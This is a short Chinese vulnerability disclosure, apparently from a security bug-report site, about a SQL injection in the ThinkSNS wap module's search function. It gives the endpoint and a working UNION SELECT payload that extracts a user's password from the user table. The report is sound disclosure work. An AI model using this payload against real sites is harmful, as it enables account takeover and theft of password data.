ThinkSNS再来一枚sql注入漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 还是为了答谢你们送的水杯。 严重的sql注入 可爆任意密码 你懂的! xss那就不用说了 ### 详细说明: wap模块的搜索没有对关键字过滤 知道表名即可估计 好在我不知道官网的表名。只有本地测试了 ### 漏洞证明: http://========/index.php?app=wap&mod=Index&act=doSearch 关键字输入 1' and 1=2 union select 1,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from cqq_user where uid=1 and 1='1 cqq_user为我本地测试的表名。 [<img src="https://images.seebug.org/upload/201211/061758585b9370578720ecf6b9eb90cfc038428b.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201211/061758585b9370578720ecf6b9eb90cfc038428b.jpg)

0%
暂无可用Exp或PoC
当前有0条受影响产品信息